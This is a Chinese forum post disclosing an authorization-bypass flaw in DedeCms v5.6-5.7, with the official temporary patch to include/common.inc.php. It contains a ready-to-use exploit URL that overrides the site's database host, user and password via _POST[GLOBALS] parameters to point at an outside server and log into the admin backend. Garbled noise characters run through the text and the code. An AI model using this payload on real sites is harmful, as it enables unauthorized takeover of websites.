最近看过此主题的会员

返回列表 发帖
织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
( D8 t/ H* g4 G. S2 R1 N- P$ V0 o, C! V
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
" j: S8 u5 g5 G1 Y0 F
此漏洞的前提是必须得到后台路径才能实现
3 z$ S. ?6 V# T5 q! B% ^6 M
官方临时解决办法:
6 N* F: Y: f0 X  \5 X, S, m  h( G
找到include/common.inc.php文件,把:

" @) g6 k: }- s; d( b) c! V+ a4 C
    foreach($_REQUEST as $_k=>$_v)
* A" q1 A0 t  @8 h- s3 K6 a0 J. V    {6 t: y7 T2 J+ l
        var_dump($_k);
& j1 z7 b" K2 z$ |8 S- s        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ); q! k% W* h# x
        {; R" D- G+ S3 T5 y* v
            exit('Request var not allow!');
- N; H. ?7 p/ V        }
! c, i0 R& J( K2 X& p9 O! ?: S5 D! t; {    }

& i) Y( r9 s( M
换成:
+ Z6 m/ s  [7 B/ G) g
    //检查和注册外部提交的变量" I, N/ q8 E) d/ J& N% E
    function CheckRequest(&$val) {) J+ q6 @" V2 `
        if (is_array($val)) {* N  v5 f( m! D7 x* F
            foreach ($val as $_k=>$_v) {
4 S/ D, R& \+ W1 h( e                CheckRequest($_k);. G1 [2 ?& ?5 ^$ P
                CheckRequest($val[$_k]);
+ r. j" O; C$ m2 m, V" I6 D' J            }
2 e5 E5 u" L" q9 v        } else
; u* w6 J! N6 X        {
4 \. H6 B8 ?  \4 C' |! c            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
" f1 R) f, u3 @9 e" F0 d' V            {
2 p  Q1 g# D4 n+ L% W8 T" F  l4 |                exit('Request var not allow!');
0 ^1 p7 \) o" b/ V2 K            }
+ {5 R( h4 @  ?$ c        }
" ^8 \6 `/ n4 x$ g6 G6 [" W4 ~    }
2 I- l% A: Z  u. r8 k3 q) D    CheckRequest($_REQUEST);6 V  A: P5 a1 |# J5 K1 t' n3 I
( F  |8 g% v* |
; r& k1 `7 b* t3 B8 d
7 r: V. p6 a- ]# g

4 Z3 M' ^4 A' K0 D3 p# a4 T# x

! [9 G1 s9 |( k8 n+ g1 j" o' M% P! r# b

  g  p0 a# J& f  o! M2 r& w8 E0 Y3 c5 U* ^4 l. k* L

1 K/ o$ b: ~/ N4 t
! c2 t+ U6 _, l) a0 B6 C$ y5 u+ r
% ?* [+ d7 I4 j% T0 I. v1 d
4 t. U: y- S# L/ P% s& S" x! x

, f- u4 }+ y+ I5 P
. T; _8 Q, V$ K! p" A3 |  m0 j9 x7 r4 T: x2 ?( Y
: P5 }- r4 p; C' ]1 _2 L1 i& r7 A

0 q+ {: f* O1 M  D4 `' B9 U2 t9 V公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表